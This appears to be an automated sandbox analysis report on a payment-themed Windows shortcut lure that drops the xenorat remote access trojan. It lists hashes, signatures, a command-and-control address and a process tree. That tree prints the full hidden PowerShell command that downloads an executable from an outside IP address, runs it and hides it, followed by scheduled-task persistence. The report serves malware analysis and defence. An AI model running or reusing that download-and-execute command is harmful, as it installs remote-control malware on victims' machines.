Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
26-07-2024 11:02
Static task
static1
Behavioral task
behavioral1
Sample
PAGO_Transferencia.lnk
Resource
win7-20240708-en
General
-
Target
PAGO_Transferencia.lnk
-
Size
2KB
-
MD5
4db66f511c6604f1be1ae032b84f8358
-
SHA1
8ab73293cf42ead05326874845622cea78822c8f
-
SHA256
1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7
-
SHA512
2cf294db093bbe00ce504d2817dced1d62d7eb8af4a7183836fb4af0288f7e5018cd2226bea522ad5464b911317bd184bb36303e766fa4a59239f87878510c67
Malware Config
Extracted
http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe
Extracted
xenorat
45.66.231.63
Holid_rat_nd8859g
-
delay
60400
-
install_path
appdata
-
port
1243
-
startup_name
HDdisplay
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 1724 PoWersheLl.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1724 PoWersheLl.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation DisplayResolution.exe -
Executes dropped EXE 10 IoCs
pid Process 4704 DisplayResolution.exe 3904 DisplayResolution.exe 4004 DisplayResolution.exe 3084 DisplayResolution.exe 1584 DisplayResolution.exe 2784 DisplayResolution.exe 2928 DisplayResolution.exe 3272 DisplayResolution.exe 1104 DisplayResolution.exe 2252 DisplayResolution.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 4704 set thread context of 3904 4704 DisplayResolution.exe 90 PID 4704 set thread context of 4004 4704 DisplayResolution.exe 91 PID 4704 set thread context of 3084 4704 DisplayResolution.exe 92 PID 4704 set thread context of 1584 4704 DisplayResolution.exe 93 PID 2784 set thread context of 2928 2784 DisplayResolution.exe 95 PID 2784 set thread context of 3272 2784 DisplayResolution.exe 96 PID 2784 set thread context of 1104 2784 DisplayResolution.exe 97 PID 2784 set thread context of 2252 2784 DisplayResolution.exe 98 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3044 3272 WerFault.exe 96 -
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4336 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1724 PoWersheLl.exe 1724 PoWersheLl.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1724 PoWersheLl.exe Token: SeDebugPrivilege 4704 DisplayResolution.exe Token: SeDebugPrivilege 2784 DisplayResolution.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2116 wrote to memory of 1724 2116 cmd.exe 85 PID 2116 wrote to memory of 1724 2116 cmd.exe 85 PID 1724 wrote to memory of 4704 1724 PoWersheLl.exe 89 PID 1724 wrote to memory of 4704 1724 PoWersheLl.exe 89 PID 1724 wrote to memory of 4704 1724 PoWersheLl.exe 89 PID 4704 wrote to memory of 3904 4704 DisplayResolution.exe 90 PID 4704 wrote to memory of 3904 4704 DisplayResolution.exe 90 PID 4704 wrote to memory of 3904 4704 DisplayResolution.exe 90 PID 4704 wrote to memory of 3904 4704 DisplayResolution.exe 90 PID 4704 wrote to memory of 3904 4704 DisplayResolution.exe 90 PID 4704 wrote to memory of 3904 4704 DisplayResolution.exe 90 PID 4704 wrote to memory of 3904 4704 DisplayResolution.exe 90 PID 4704 wrote to memory of 3904 4704 DisplayResolution.exe 90 PID 4704 wrote to memory of 4004 4704 DisplayResolution.exe 91 PID 4704 wrote to memory of 4004 4704 DisplayResolution.exe 91 PID 4704 wrote to memory of 4004 4704 DisplayResolution.exe 91 PID 4704 wrote to memory of 4004 4704 DisplayResolution.exe 91 PID 4704 wrote to memory of 4004 4704 DisplayResolution.exe 91 PID 4704 wrote to memory of 4004 4704 DisplayResolution.exe 91 PID 4704 wrote to memory of 4004 4704 DisplayResolution.exe 91 PID 4704 wrote to memory of 4004 4704 DisplayResolution.exe 91 PID 4704 wrote to memory of 3084 4704 DisplayResolution.exe 92 PID 4704 wrote to memory of 3084 4704 DisplayResolution.exe 92 PID 4704 wrote to memory of 3084 4704 DisplayResolution.exe 92 PID 4704 wrote to memory of 3084 4704 DisplayResolution.exe 92 PID 4704 wrote to memory of 3084 4704 DisplayResolution.exe 92 PID 4704 wrote to memory of 3084 4704 DisplayResolution.exe 92 PID 4704 wrote to memory of 3084 4704 DisplayResolution.exe 92 PID 4704 wrote to memory of 3084 4704 DisplayResolution.exe 92 PID 4704 wrote to memory of 1584 4704 DisplayResolution.exe 93 PID 4704 wrote to memory of 1584 4704 DisplayResolution.exe 93 PID 4704 wrote to memory of 1584 4704 DisplayResolution.exe 93 PID 4704 wrote to memory of 1584 4704 DisplayResolution.exe 93 PID 4704 wrote to memory of 1584 4704 DisplayResolution.exe 93 PID 4704 wrote to memory of 1584 4704 DisplayResolution.exe 93 PID 4704 wrote to memory of 1584 4704 DisplayResolution.exe 93 PID 4704 wrote to memory of 1584 4704 DisplayResolution.exe 93 PID 4004 wrote to memory of 2784 4004 DisplayResolution.exe 94 PID 4004 wrote to memory of 2784 4004 DisplayResolution.exe 94 PID 4004 wrote to memory of 2784 4004 DisplayResolution.exe 94 PID 2784 wrote to memory of 2928 2784 DisplayResolution.exe 95 PID 2784 wrote to memory of 2928 2784 DisplayResolution.exe 95 PID 2784 wrote to memory of 2928 2784 DisplayResolution.exe 95 PID 2784 wrote to memory of 2928 2784 DisplayResolution.exe 95 PID 2784 wrote to memory of 2928 2784 DisplayResolution.exe 95 PID 2784 wrote to memory of 2928 2784 DisplayResolution.exe 95 PID 2784 wrote to memory of 2928 2784 DisplayResolution.exe 95 PID 2784 wrote to memory of 2928 2784 DisplayResolution.exe 95 PID 2784 wrote to memory of 3272 2784 DisplayResolution.exe 96 PID 2784 wrote to memory of 3272 2784 DisplayResolution.exe 96 PID 2784 wrote to memory of 3272 2784 DisplayResolution.exe 96 PID 2784 wrote to memory of 3272 2784 DisplayResolution.exe 96 PID 2784 wrote to memory of 3272 2784 DisplayResolution.exe 96 PID 2784 wrote to memory of 3272 2784 DisplayResolution.exe 96 PID 2784 wrote to memory of 3272 2784 DisplayResolution.exe 96 PID 2784 wrote to memory of 3272 2784 DisplayResolution.exe 96 PID 2784 wrote to memory of 1104 2784 DisplayResolution.exe 97 PID 2784 wrote to memory of 1104 2784 DisplayResolution.exe 97 PID 2784 wrote to memory of 1104 2784 DisplayResolution.exe 97 PID 2784 wrote to memory of 1104 2784 DisplayResolution.exe 97 PID 2784 wrote to memory of 1104 2784 DisplayResolution.exe 97 PID 2784 wrote to memory of 1104 2784 DisplayResolution.exe 97 PID 2784 wrote to memory of 1104 2784 DisplayResolution.exe 97 PID 2784 wrote to memory of 1104 2784 DisplayResolution.exe 97
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\PAGO_Transferencia.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe"C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe" -ExecutionPolicy -Bypass -WindowStyle hiDdEn -hiDdEn -Command PkgMgr.exe;(new-object System.Net.WebClient).DownloadFile('http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe','DisplayResolution.exe');./'DisplayResolution.exe';(get-item 'DisplayResolution.exe').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe"C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exeC:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3904
-
-
C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exeC:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe"C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exeC:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2928
-
-
C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exeC:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe6⤵
- Executes dropped EXE
PID:3272 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 807⤵
- Program crash
PID:3044
-
-
-
C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exeC:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1104
-
-
C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exeC:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2252
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exeC:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3084 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "HDdisplay" /XML "C:\Users\Admin\AppData\Local\Temp\tmp80E3.tmp" /F5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4336
-
-
-
C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exeC:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1584
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3272 -ip 32721⤵PID:1184
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
522B
MD50f39d6b9afc039d81ff31f65cbf76826
SHA18356d04fe7bba2695d59b6caf5c59f58f3e1a6d8
SHA256ea16b63ffd431ebf658b903710b6b3a9b8a2eb6814eee3a53b707a342780315d
SHA5125bad54adb2e32717ef6275f49e2f101dd7e2011c9be14a32e5c29051e8a3f608cbd0b44ac4855ab21e790cb7a5d84c5f69de087074fd01b35259d34d07f5aaf9
-
Filesize
150KB
MD5fcc55ef512ccf37a07ec703b59cc7aad
SHA19abef70ff67a2a7032ac1da4cd65424e7b2130b7
SHA25638b26e2364bc081a90145838451341f14bda3cbd15bba54bf0114cab5d2f8667
SHA512e26567479340c42126937edba18399af1d070b89c95fb8871dcbf3afb524bc89e289d361f4aa038f655e77b28e095ae3e487d8938248ea3d32677168acd17517
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5c1fb6c7a2a252aad9a614b2a29769d98
SHA1f6d4f83e1cb6612498178b151edfc155432138c6
SHA256da84b1e8d3d3d979614cb431546c9806ca977b2cf74c5b86e42598408814f292
SHA5123569c7553fda61cf8af6a0e7480e8fc4432ba7c8b6e00fb41e64ea1d73debf2000618ea1bdd193668ddbe43b1d77ae3c934ed80ffca983afc680cd8d595d2529